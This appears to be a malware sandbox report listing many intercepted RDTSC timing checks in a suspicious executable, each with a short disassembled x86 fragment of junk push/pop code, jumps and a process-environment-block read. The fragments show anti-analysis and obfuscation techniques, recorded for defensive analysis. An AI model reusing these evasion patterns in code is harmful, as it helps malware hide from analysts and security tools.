Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B29A8A second address: B29AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F5BD0C7BA76h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B29D2A second address: B29D69 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5BD0FFF0D5h 0x00000008 jmp 00007F5BD0FFF0CFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push edi 0x00000015 pop edi 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F5BD0FFF0D8h 0x0000001d popad 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B29D69 second address: B29D6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B29D6F second address: B29D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B29D73 second address: B29D77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B29EE5 second address: B29EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B320DE second address: B320EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F5BD0C7BA66h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B32274 second address: B32278 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B32278 second address: B322A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 jmp 00007F5BD0C7BA78h 0x0000000e je 00007F5BD0C7BA66h 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B322A0 second address: B322B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F5BD0FFF0C6h 0x0000000a jp 00007F5BD0FFF0C6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B32F37 second address: B32F3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B32F3B second address: B32F5C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5BD0FFF0D3h 0x0000000d jne 00007F5BD0FFF0C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B32F5C second address: B32F75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA75h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B32F75 second address: B32FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5BD0FFF0D1h 0x0000000d ja 00007F5BD0FFF0DAh 0x00000013 jmp 00007F5BD0FFF0D4h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B32FA8 second address: B32FBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BD0C7BA6Eh 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B336A5 second address: B336AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B336AE second address: B336BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B336BA second address: B336BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B3AD09 second address: B3AD18 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5BD0C7BA66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B3AD18 second address: B3AD36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5BD0FFF0C6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5BD0FFF0CDh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B3AD36 second address: B3AD3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B4D0D8 second address: B4D0F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D9h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B4D0F6 second address: B4D142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BD0C7BA6Eh 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F5BD0C7BA9Ch 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F5BD0C7BA78h 0x0000001a push eax 0x0000001b pop eax 0x0000001c jmp 00007F5BD0C7BA6Eh 0x00000021 popad 0x00000022 push esi 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B4F62D second address: B4F648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BD0FFF0D7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B4F648 second address: B4F66B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA6Fh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F5BD0C7BA6Eh 0x00000011 push edx 0x00000012 pop edx 0x00000013 jp 00007F5BD0C7BA66h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B5CD92 second address: B5CDB7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5BD0FFF0E0h 0x00000008 jmp 00007F5BD0FFF0D8h 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B63EC2 second address: B63EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B63EC8 second address: B63ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B63ECC second address: B63ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B63ED0 second address: B63F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F5BD0FFF0CCh 0x0000000e pushad 0x0000000f push ecx 0x00000010 jmp 00007F5BD0FFF0D3h 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5BD0FFF0CCh 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B63F0A second address: B63F26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B64065 second address: B6406D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B6406D second address: B6407B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B6407B second address: B6408D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jl 00007F5BD0FFF0C6h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B64351 second address: B6435B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5BD0C7BA66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B6435B second address: B64375 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F5BD0FFF0D3h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B6501D second address: B65033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F5BD0C7BA6Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B65033 second address: B65058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5BD0FFF0CFh 0x0000000a pushad 0x0000000b jmp 00007F5BD0FFF0CEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe RDTSC instruction interceptor: First address: B68975 second address: B6897B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B6897B second address: B6897F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B6897F second address: B6898F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a js 00007F5BD0C7BA66h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B6898F second address: B689EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D9h 0x00000007 jmp 00007F5BD0FFF0D7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnp 00007F5BD0FFF0F6h 0x00000016 push edx 0x00000017 jns 00007F5BD0FFF0C6h 0x0000001d pushad 0x0000001e popad 0x0000001f pop edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F5BD0FFF0D2h 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B689EB second address: B689EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: B689EF second address: B689F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A8059F second address: A805AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5BD0C7BA66h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A805AC second address: A805C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5BD0FFF0D4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A805C5 second address: A805D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5BD0C7BA66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: BA3018 second address: BA3023 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: BBB907 second address: BBB92F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F5BD0C7BA6Ah 0x00000011 pushad 0x00000012 popad 0x00000013 jns 00007F5BD0C7BA66h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C89993 second address: C89998 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C889CB second address: C889F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 js 00007F5BD0C7BA66h 0x0000000e jmp 00007F5BD0C7BA77h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C88E40 second address: C88E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F5BD0FFF0D7h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C88E5E second address: C88E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C88E68 second address: C88E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jns 00007F5BD0FFF0CEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C8913B second address: C89141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C89298 second address: C8929C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C8929C second address: C892A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C892A6 second address: C892AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C892AC second address: C892B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C8D9D6 second address: C8D9DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C8DCA7 second address: C8DCAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C8F3AD second address: C8F3D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F5BD0FFF0D1h 0x00000010 pop ebx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jnc 00007F5BD0FFF0C6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C8F3D5 second address: C8F3DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C8F3DB second address: C8F3E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C8F3E0 second address: C8F41D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA73h 0x00000007 pushad 0x00000008 jmp 00007F5BD0C7BA76h 0x0000000d jmp 00007F5BD0C7BA6Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C8F41D second address: C8F423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C910E8 second address: C910EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C910EE second address: C9111F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5BD0FFF0CEh 0x0000000b jmp 00007F5BD0FFF0D3h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jg 00007F5BD0FFF0C6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: C9111F second address: C91123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70019 second address: 6F7001D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7001D second address: 6F7003A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7003A second address: 6F70040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70040 second address: 6F70060 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5BD0C7BA75h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70060 second address: 6F70066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70066 second address: 6F7006A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7006A second address: 6F7008B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F5BD0FFF0CFh 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov dx, si 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7008B second address: 6F700AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov eax, dword ptr fs:[00000030h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5BD0C7BA72h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F700AD second address: 6F700B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F700B3 second address: 6F70182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5BD0C7BA6Ch 0x00000009 add ch, FFFFFFE8h 0x0000000c jmp 00007F5BD0C7BA6Bh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F5BD0C7BA78h 0x00000018 xor cx, 5048h 0x0000001d jmp 00007F5BD0C7BA6Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 sub esp, 18h 0x00000029 pushad 0x0000002a call 00007F5BD0C7BA74h 0x0000002f pushfd 0x00000030 jmp 00007F5BD0C7BA72h 0x00000035 and ecx, 6444F5D8h 0x0000003b jmp 00007F5BD0C7BA6Bh 0x00000040 popfd 0x00000041 pop ecx 0x00000042 mov esi, ebx 0x00000044 popad 0x00000045 push ecx 0x00000046 jmp 00007F5BD0C7BA70h 0x0000004b mov dword ptr [esp], ebx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 mov bl, DEh 0x00000053 pushfd 0x00000054 jmp 00007F5BD0C7BA76h 0x00000059 xor cx, 3A98h 0x0000005e jmp 00007F5BD0C7BA6Bh 0x00000063 popfd 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70182 second address: 6F7019A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BD0FFF0D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7019A second address: 6F7022C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [eax+10h] 0x0000000e jmp 00007F5BD0C7BA76h 0x00000013 xchg eax, esi 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F5BD0C7BA6Eh 0x0000001b jmp 00007F5BD0C7BA75h 0x00000020 popfd 0x00000021 pushad 0x00000022 mov di, ax 0x00000025 jmp 00007F5BD0C7BA6Ah 0x0000002a popad 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e mov bx, D394h 0x00000032 pushfd 0x00000033 jmp 00007F5BD0C7BA6Dh 0x00000038 sub ch, 00000056h 0x0000003b jmp 00007F5BD0C7BA71h 0x00000040 popfd 0x00000041 popad 0x00000042 xchg eax, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F7022C second address: 6F70230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70230 second address: 6F70243 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: 6F70243 second address: 6F70249 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
